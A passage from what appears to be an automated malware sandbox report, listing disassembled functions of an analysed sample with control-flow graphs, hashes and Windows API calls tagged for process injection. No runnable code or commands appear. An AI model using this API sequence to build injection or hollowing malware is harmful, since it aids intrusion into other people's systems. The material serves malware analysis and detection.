                                                                                    Function 052FDC48 Relevance: .2, Instructions: 167COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bab5db87e69f9bd01a67a658572a7b7f82d9725921f3638846aa6dfa69113a8c
                                                                                    • Instruction ID: 85a978d33c0abeac316ab6795f7291d006955b5095ee1bba7391abab6cf7c28e
                                                                                    • Opcode Fuzzy Hash: bab5db87e69f9bd01a67a658572a7b7f82d9725921f3638846aa6dfa69113a8c
                                                                                    • Instruction Fuzzy Hash: 4E61E575E002199FDB05DFA9D984AEEFBF2FF88300F108069E919AB259DB745946CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F87E3D Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1336 6f87e3d-6f87edd 1338 6f87edf-6f87ee9 1336->1338 1339 6f87f16-6f87f36 1336->1339 1338->1339 1340 6f87eeb-6f87eed 1338->1340 1346 6f87f38-6f87f42 1339->1346 1347 6f87f6f-6f87f9e 1339->1347 1341 6f87eef-6f87ef9 1340->1341 1342 6f87f10-6f87f13 1340->1342 1344 6f87efb 1341->1344 1345 6f87efd-6f87f0c 1341->1345 1342->1339 1344->1345 1345->1345 1348 6f87f0e 1345->1348 1346->1347 1349 6f87f44-6f87f46 1346->1349 1355 6f87fa0-6f87faa 1347->1355 1356 6f87fd7-6f88091 CreateProcessA 1347->1356 1348->1342 1350 6f87f48-6f87f52 1349->1350 1351 6f87f69-6f87f6c 1349->1351 1353 6f87f54 1350->1353 1354 6f87f56-6f87f65 1350->1354 1351->1347 1353->1354 1354->1354 1357 6f87f67 1354->1357 1355->1356 1358 6f87fac-6f87fae 1355->1358 1367 6f8809a-6f88120 1356->1367 1368 6f88093-6f88099 1356->1368 1357->1351 1360 6f87fb0-6f87fba 1358->1360 1361 6f87fd1-6f87fd4 1358->1361 1362 6f87fbc 1360->1362 1363 6f87fbe-6f87fcd 1360->1363 1361->1356 1362->1363 1363->1363 1365 6f87fcf 1363->1365 1365->1361 1378 6f88130-6f88134 1367->1378 1379 6f88122-6f88126 1367->1379 1368->1367 1381 6f88144-6f88148 1378->1381 1382 6f88136-6f8813a 1378->1382 1379->1378 1380 6f88128 1379->1380 1380->1378 1384 6f88158-6f8815c 1381->1384 1385 6f8814a-6f8814e 1381->1385 1382->1381 1383 6f8813c 1382->1383 1383->1381 1387 6f8816e-6f88175 1384->1387 1388 6f8815e-6f88164 1384->1388 1385->1384 1386 6f88150 1385->1386 1386->1384 1389 6f8818c 1387->1389 1390 6f88177-6f88186 1387->1390 1388->1387 1392 6f8818d 1389->1392 1390->1389 1392->1392
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 389fe9d81d236a468b97fb272d4644486a409307f04702a8a064e8100aea0099
                                                                                    • Instruction ID: 35ff320f36bee7d2b0321479b4efdd96a3e1ad92219b7efdcab1da88d5151292
                                                                                    • Opcode Fuzzy Hash: 389fe9d81d236a468b97fb272d4644486a409307f04702a8a064e8100aea0099
                                                                                    • Instruction Fuzzy Hash: DBA17B71D007199FEF60EF69C841BEEBBB2BF44310F2485A9E818A7240DB749985CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F87E48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1393 6f87e48-6f87edd 1395 6f87edf-6f87ee9 1393->1395 1396 6f87f16-6f87f36 1393->1396 1395->1396 1397 6f87eeb-6f87eed 1395->1397 1403 6f87f38-6f87f42 1396->1403 1404 6f87f6f-6f87f9e 1396->1404 1398 6f87eef-6f87ef9 1397->1398 1399 6f87f10-6f87f13 1397->1399 1401 6f87efb 1398->1401 1402 6f87efd-6f87f0c 1398->1402 1399->1396 1401->1402 1402->1402 1405 6f87f0e 1402->1405 1403->1404 1406 6f87f44-6f87f46 1403->1406 1412 6f87fa0-6f87faa 1404->1412 1413 6f87fd7-6f88091 CreateProcessA 1404->1413 1405->1399 1407 6f87f48-6f87f52 1406->1407 1408 6f87f69-6f87f6c 1406->1408 1410 6f87f54 1407->1410 1411 6f87f56-6f87f65 1407->1411 1408->1404 1410->1411 1411->1411 1414 6f87f67 1411->1414 1412->1413 1415 6f87fac-6f87fae 1412->1415 1424 6f8809a-6f88120 1413->1424 1425 6f88093-6f88099 1413->1425 1414->1408 1417 6f87fb0-6f87fba 1415->1417 1418 6f87fd1-6f87fd4 1415->1418 1419 6f87fbc 1417->1419 1420 6f87fbe-6f87fcd 1417->1420 1418->1413 1419->1420 1420->1420 1422 6f87fcf 1420->1422 1422->1418 1435 6f88130-6f88134 1424->1435 1436 6f88122-6f88126 1424->1436 1425->1424 1438 6f88144-6f88148 1435->1438 1439 6f88136-6f8813a 1435->1439 1436->1435 1437 6f88128 1436->1437 1437->1435 1441 6f88158-6f8815c 1438->1441 1442 6f8814a-6f8814e 1438->1442 1439->1438 1440 6f8813c 1439->1440 1440->1438 1444 6f8816e-6f88175 1441->1444 1445 6f8815e-6f88164 1441->1445 1442->1441 1443 6f88150 1442->1443 1443->1441 1446 6f8818c 1444->1446 1447 6f88177-6f88186 1444->1447 1445->1444 1449 6f8818d 1446->1449 1447->1446 1449->1449
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 3b657656e59006b51ea05b600de46a174e2c65c82ae17f189b956bd71972f864
                                                                                    • Instruction ID: 9977468bb6a5550a91571a8218eb4976e919f4e60d4c5fbead2d33aadee405bd
                                                                                    • Opcode Fuzzy Hash: 3b657656e59006b51ea05b600de46a174e2c65c82ae17f189b956bd71972f864
                                                                                    • Instruction Fuzzy Hash: E2916B71D006599FEF60EF69CC41BEEBBB2BF48310F1485A9E818A7240DB749985CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BCAE70 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1740 4bcae70-4bcae7f 1741 4bcaeab-4bcaeaf 1740->1741 1742 4bcae81-4bcae8e call 4bc9878 1740->1742 1743 4bcaeb1-4bcaebb 1741->1743 1744 4bcaec3-4bcaf04 1741->1744 1749 4bcaea4 1742->1749 1750 4bcae90 1742->1750 1743->1744 1751 4bcaf06-4bcaf0e 1744->1751 1752 4bcaf11-4bcaf1f 1744->1752 1749->1741 1795 4bcae96 call 4bcb0f8 1750->1795 1796 4bcae96 call 4bcb108 1750->1796 1751->1752 1753 4bcaf21-4bcaf26 1752->1753 1754 4bcaf43-4bcaf45 1752->1754 1758 4bcaf28-4bcaf2f call 4bca854 1753->1758 1759 4bcaf31 1753->1759 1757 4bcaf48-4bcaf4f 1754->1757 1755 4bcae9c-4bcae9e 1755->1749 1756 4bcafe0-4bcb0a0 1755->1756 1790 4bcb0a8-4bcb0d3 GetModuleHandleW 1756->1790 1791 4bcb0a2-4bcb0a5 1756->1791 1761 4bcaf5c-4bcaf63 1757->1761 1762 4bcaf51-4bcaf59 1757->1762 1760 4bcaf33-4bcaf41 1758->1760 1759->1760 1760->1757 1764 4bcaf65-4bcaf6d 1761->1764 1765 4bcaf70-4bcaf79 call 4bca864 1761->1765 1762->1761 1764->1765 1771 4bcaf7b-4bcaf83 1765->1771 1772 4bcaf86-4bcaf8b 1765->1772 1771->1772 1773 4bcaf8d-4bcaf94 1772->1773 1774 4bcafa9-4bcafad 1772->1774 1773->1774 1776 4bcaf96-4bcafa6 call 4bca874 call 4bca884 1773->1776 1777 4bcafb3-4bcafb6 1774->1777 1776->1774 1780 4bcafb8-4bcafd6 1777->1780 1781 4bcafd9-4bcafdf 1777->1781 1780->1781 1792 4bcb0dc-4bcb0f0 1790->1792 1793 4bcb0d5-4bcb0db 1790->1793 1791->1790 1793->1792 1795->1755 1796->1755
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 04BCB0C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 1a6a1faf553f2f07c218db2dba88c1981baf1470d044f72a6a092e0a81f3a38e
                                                                                    • Instruction ID: 7485f7abf26ec45a10672f7bb1555b6790309207e0ae5ab0d38daa3e600703a9
                                                                                    • Opcode Fuzzy Hash: 1a6a1faf553f2f07c218db2dba88c1981baf1470d044f72a6a092e0a81f3a38e
                                                                                    • Instruction Fuzzy Hash: 4D7123B0A00B098FEB24DF2AD48475ABBF1FF88304F10896DE44AD7A50D775F9498B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04CD0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1797 4cd0bfc-4cd42fc 1800 4cd43ac-4cd43cc call 4cd0ad4 1797->1800 1801 4cd4302-4cd4307 1797->1801 1808 4cd43cf-4cd43dc 1800->1808 1803 4cd4309-4cd4340 1801->1803 1804 4cd435a-4cd4392 CallWindowProcW 1801->1804 1811 4cd4349-4cd4358 1803->1811 1812 4cd4342-4cd4348 1803->1812 1805 4cd439b-4cd43aa 1804->1805 1806 4cd4394-4cd439a 1804->1806 1805->1808 1806->1805 1811->1808 1812->1811
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 04CD4381
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366234503.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4cd0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: 3ab96dee31d5087bb3a7098fd4d9555fcc763bef3a08d25a57e64851463ba80d
                                                                                    • Instruction ID: 839a19c3e21b89b8bf9715272f25efa433461dc80de84a30c1ca29f6c6f1a82e
                                                                                    • Opcode Fuzzy Hash: 3ab96dee31d5087bb3a7098fd4d9555fcc763bef3a08d25a57e64851463ba80d
                                                                                    • Instruction Fuzzy Hash: E4411AB5900305DFDB14CF99C448AAEBBF6FF88314F248459E619A7321D374A941CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BC449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1814 4bc449c-4bc59d9 CreateActCtxA 1817 4bc59db-4bc59e1 1814->1817 1818 4bc59e2-4bc5a3c 1814->1818 1817->1818 1825 4bc5a3e-4bc5a41 1818->1825 1826 4bc5a4b-4bc5a4f 1818->1826 1825->1826 1827 4bc5a60 1826->1827 1828 4bc5a51-4bc5a5d 1826->1828 1829 4bc5a61 1827->1829 1828->1827 1829->1829
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 04BC59C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: df7e12508afc865eba7cb4a478b63a793f6965dbcede75fd6f3c923254ab881a
                                                                                    • Instruction ID: f5cea59e18e007505986d26362c78f1b935d1093e7a16ae26b23cdab91f86378
                                                                                    • Opcode Fuzzy Hash: df7e12508afc865eba7cb4a478b63a793f6965dbcede75fd6f3c923254ab881a
                                                                                    • Instruction Fuzzy Hash: 3741D4B0D01729DBEB24DFAAC884BDDBBB5FF44304F208169D408AB255D7756946CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BC590C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1831 4bc590c-4bc59d9 CreateActCtxA 1833 4bc59db-4bc59e1 1831->1833 1834 4bc59e2-4bc5a3c 1831->1834 1833->1834 1841 4bc5a3e-4bc5a41 1834->1841 1842 4bc5a4b-4bc5a4f 1834->1842 1841->1842 1843 4bc5a60 1842->1843 1844 4bc5a51-4bc5a5d 1842->1844 1845 4bc5a61 1843->1845 1844->1843 1845->1845
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 04BC59C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 9139ef96ccd87787693270e0bdce7fca4b2d9a8376b1298babf130e47363b4e7
                                                                                    • Instruction ID: df606e0d0b54d1deb56a12b0815af09d16a7ae57d310e63193da0f66bbcaaae5
                                                                                    • Opcode Fuzzy Hash: 9139ef96ccd87787693270e0bdce7fca4b2d9a8376b1298babf130e47363b4e7
                                                                                    • Instruction Fuzzy Hash: BB41D4B1D01729DFEB24DFA9C884BDDBBB1BF48304F20846AD408AB255DB756986CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F87BC0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1857 6f87bc0-6f87c0e 1859 6f87c1e-6f87c5d WriteProcessMemory 1857->1859 1860 6f87c10-6f87c1c 1857->1860 1862 6f87c5f-6f87c65 1859->1862 1863 6f87c66-6f87c96 1859->1863 1860->1859 1862->1863
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 9f3db42a415111f53643a07d151ec0f93c37fa17bd219a104190097e93838017
                                                                                    • Instruction ID: 94fb1b2ca051ce614da9f4de569fb5ea16f8a8ccda8ee2f48746f936214f6d2b
                                                                                    • Opcode Fuzzy Hash: 9f3db42a415111f53643a07d151ec0f93c37fa17bd219a104190097e93838017
                                                                                    • Instruction Fuzzy Hash: 162136B1D003499FDB20DFAAC881BDEBBF5FF48310F10842AE919A7241C7799940CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F87BB9 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1847 6f87bb9-6f87c0e 1849 6f87c1e-6f87c5d WriteProcessMemory 1847->1849 1850 6f87c10-6f87c1c 1847->1850 1852 6f87c5f-6f87c65 1849->1852 1853 6f87c66-6f87c96 1849->1853 1850->1849 1852->1853
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 857deb5a7954361f667ba26e010a3639da55cbc8b70255a020962057bff4c9a6
                                                                                    • Instruction ID: f5b57637e175828fc76cf6d17ff74158d0b383adfbe7670e981842c4cba71cd1
                                                                                    • Opcode Fuzzy Hash: 857deb5a7954361f667ba26e010a3639da55cbc8b70255a020962057bff4c9a6
                                                                                    • Instruction Fuzzy Hash: 882157B5D003499FDB10DFA9C881BEEBBF0FF48310F10882AE959A7241D7789941CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BCC9E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1867 4bcc9e0-4bcd3d4 DuplicateHandle 1869 4bcd3dd-4bcd3fa 1867->1869 1870 4bcd3d6-4bcd3dc 1867->1870 1870->1869
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04BCD306,?,?,?,?,?), ref: 04BCD3C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: f4ce9faeea59ade3680d6a2bff4ca6c55076471e1366306f2ffe35bf981829d9
                                                                                    • Instruction ID: 3c2f564c08f825caedc647aacbb79ac58de644b718c6952d2f073d04bcf8b1d8
                                                                                    • Opcode Fuzzy Hash: f4ce9faeea59ade3680d6a2bff4ca6c55076471e1366306f2ffe35bf981829d9
                                                                                    • Instruction Fuzzy Hash: CE21E4B5900348DFDB10CF9AD884ADEFBF8EB48310F14846AE915A3310D379A954CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F875EB Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1873 6f875eb-6f8763b 1875 6f8764b-6f8767b Wow64SetThreadContext 1873->1875 1876 6f8763d-6f87649 1873->1876 1878 6f8767d-6f87683 1875->1878 1879 6f87684-6f876b4 1875->1879 1876->1875 1878->1879
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 9e0dc22c87837f092e8b588119b1460576b13a37ae1e1ae6c7543019347ab144
                                                                                    • Instruction ID: 36d82833957a9731a655cfba4e96ace221a517d62c419753329dd50413bfde9a
                                                                                    • Opcode Fuzzy Hash: 9e0dc22c87837f092e8b588119b1460576b13a37ae1e1ae6c7543019347ab144
                                                                                    • Instruction Fuzzy Hash: 4F213771D003098FDB60DFAAC4857EEBBF4EF48314F14842AD819A7240C7789945CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F87CA9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1883 6f87ca9-6f87d3d ReadProcessMemory 1886 6f87d3f-6f87d45 1883->1886 1887 6f87d46-6f87d76 1883->1887 1886->1887
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: 4a8b9bb8f201b86d75985a62bd5b2b17d17f2b6e2a6497a463ca5df378cfdd25
                                                                                    • Instruction ID: f5d022d59f8a18953171ebba30cc2ef7d89d5b5e0eca0d78bbb7f4b5d5abdda9
                                                                                    • Opcode Fuzzy Hash: 4a8b9bb8f201b86d75985a62bd5b2b17d17f2b6e2a6497a463ca5df378cfdd25
                                                                                    • Instruction Fuzzy Hash: 072119B5D003499FDB10DF99C841BEEBBF5FF48310F50842AE959A7240D7799541CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F875F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1891 6f875f0-6f8763b 1893 6f8764b-6f8767b Wow64SetThreadContext 1891->1893 1894 6f8763d-6f87649 1891->1894 1896 6f8767d-6f87683 1893->1896 1897 6f87684-6f876b4 1893->1897 1894->1893 1896->1897
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 78c895fba38717df42bf4b4ced77ca3c524daa219f8f55833300009047dd88e9
                                                                                    • Instruction ID: 3e2f38b802554f268897787bcabed79ddce9821c086f8336704a39dc5c8eefaf
                                                                                    • Opcode Fuzzy Hash: 78c895fba38717df42bf4b4ced77ca3c524daa219f8f55833300009047dd88e9
                                                                                    • Instruction Fuzzy Hash: 22212771D003098FDB60DFAAC485BEEBBF4EF49324F14842AD819A7240D778A945CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F87CB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1901 6f87cb0-6f87d3d ReadProcessMemory 1904 6f87d3f-6f87d45 1901->1904 1905 6f87d46-6f87d76 1901->1905 1904->1905
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: af6d89d84a9c16334ab365a16c4c80feeefdd48ec59098fa239dcc4addf1c285
                                                                                    • Instruction ID: 6919adc512565c986343c92ddfb805f41852f3953bd18cab6fdab9fd10538f28
                                                                                    • Opcode Fuzzy Hash: af6d89d84a9c16334ab365a16c4c80feeefdd48ec59098fa239dcc4addf1c285
                                                                                    • Instruction Fuzzy Hash: 4221E6B1D003599FDB10DFAAC881BEEBBF5FF48310F508429E919A7240D7799941CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 06F87AF8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F87B6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: ed8df7d882a60940fcf8ec44d5fd554e2181cb25ad2fb2f738fe8f0ad43c3dd1
                                                                                    • Instruction ID: 281e212cebdb6402b84c5f90ebabc7ea4ae69fcb90921ea7f575dd0343f6bf15
                                                                                    • Opcode Fuzzy Hash: ed8df7d882a60940fcf8ec44d5fd554e2181cb25ad2fb2f738fe8f0ad43c3dd1
                                                                                    • Instruction Fuzzy Hash: E1115975D003489FDB20DFAAC844BDEBBF5EF48320F24841AE915A7250C7759941CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BCA8B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04BCB141,00000800,00000000,00000000), ref: 04BCB352
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: c4f96295d9c879e6417800b9afd3fa9a1c98e32b5d5b66bc1b057da81f013170
                                                                                    • Instruction ID: 478ce98c431d2032619b452ace5b72352186ead35307a2c5fc811bc2548abd5e
                                                                                    • Opcode Fuzzy Hash: c4f96295d9c879e6417800b9afd3fa9a1c98e32b5d5b66bc1b057da81f013170
                                                                                    • Instruction Fuzzy Hash: 631114B69043489FDB20CF9AD484B9EFBF4EB88310F10846EE819A7200C375A545CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BCB2E0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04BCB141,00000800,00000000,00000000), ref: 04BCB352
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
